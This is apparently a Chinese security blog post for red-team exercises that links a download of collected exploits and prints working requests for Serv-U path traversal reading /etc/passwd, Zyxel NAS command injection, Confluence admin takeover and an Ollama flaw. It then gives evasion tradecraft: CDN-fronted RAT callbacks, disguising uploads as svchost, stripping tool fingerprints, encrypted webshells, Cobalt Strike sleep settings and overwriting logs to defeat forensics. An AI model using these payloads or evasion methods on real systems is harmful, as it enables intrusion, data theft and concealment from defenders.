点击"仙网攻城狮”关注我们哦~
不当想研发的渗透人不是好运维
让我们每天进步一点点
简介
都是网上收集的POC和EXP,最新收集时间是2024年五月,需要的自取。
表里没有的可以翻翻之前的文章,资源比较零散没有整合起来。
文件链接:
https://pan.baidu.com/s/1OiyRctbpROh5AZO0SJ9kzQ?pwd=6666
其他资源失效了请给我留言
实战
CVE-2024-28995 Serv-U
EXP
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd
文章连接:https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
CVE-2024-37032 开源AI模型 Ollama 远程代码执行漏洞
POC:http://[victim]:11434/api/pull
文章连接:https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
CVE-2024-29972 – NsaRescueAngel后门账户
POC:ip后面直接添加
/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__('subprocess').check_output('id', shell=True)%23信息泄露
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--
CVE-2023-22515-Atlassian Confluence Data Center 权限管理不当
EXPGET /server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: localhost:8090
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Atlassian-Token: no-check在进行覆盖 setupComplete=false 之后重新注册管理员POST /setup/setupadministrator.action HTTP/1.1
Host:127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencodedusername=elk&fullName=elk&email=elk@qq.comt&password=elk&confirm=elk&setup-next-button=Next
祝各位HVV顺利
工作环境
工作时全部操作均在虚拟机中完成
虚拟机中不登陆个人账号,如QQ、微信、网盘、CSDN等
渗透环境、开发环境、调试环境需要分开,从目标服务器上下载的程序需要在单独的环境中测试运行
渗透虚拟机中全程使用代理IP上网
物理机必须安装安全防护软件,并安装最新补丁,卸载与公司相关的特定软件
fofa、cmd5、天眼查等第三方工具平台账号密码不得与公司有关,云协作平台同理
RAT使用CDN保护的域名上线
尽量不使用公司网络出口,可以使用移动4G网卡,然后虚拟机再链代理
渗透工具
WebShell不能使用普通一句话木马,连接端使用加密流量,建议使用蚁剑
不使用默认冰蝎,需要修改为硬编码密钥
内网渗透时尽量使用socks代理,在本地操作
上传程序到目标服务器时,需要修改文件名:如svchost等,尽量不上传内部自研工具
公开工具需要去除特征指纹,如:sqlmap、masscan、Beacon证书
工具需要设置线程或访问频率,如sqlmap的--delay、内网扫描时线程不大于5
Cobalt Strike后⻔上线后,设置time.sleep⼤于500秒
手机短信验证码需使用在线平台如z-sms.com
socks代理通道需要使用SSL加密
重点
攻防演习成功的关键是团队协作,要互相帮助学习和进步,不要勾心斗角,每个团队的成功都需要有人当红花有人当绿叶的,外网打点与内网渗透同等重要
渗透过程中,记住上传的webshell、木马等地址,服务器添加的账号,项目结束后要删除或描述在报告中,避免不必要的麻烦
登陆3389不建议添加用户,尝试激活guest,如必须要添加账号,账号名与目标相关即可,避免使用qax、qaxNB等友商关键词
清理日志时需要以文件覆盖的方式删除文件,防止数据恢复,或者仅删除指定ID的日志
碰到蜜罐就不要慌,多喝点花茶,这样嘎了会比较香
往期内容
2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP
Stable DiffusionAI绘画一键启动整合包
能让你躺着挖洞的BurpSuite插件
更多资讯长按二维码 关注我们
专业的信息安全团队,给你最安全的保障。定期推送黑客知识和网络安全知识文章,让各位了解黑客的世界,学习黑客知识,普及安全知识,提高安全意识。
觉得不错点个“赞”呗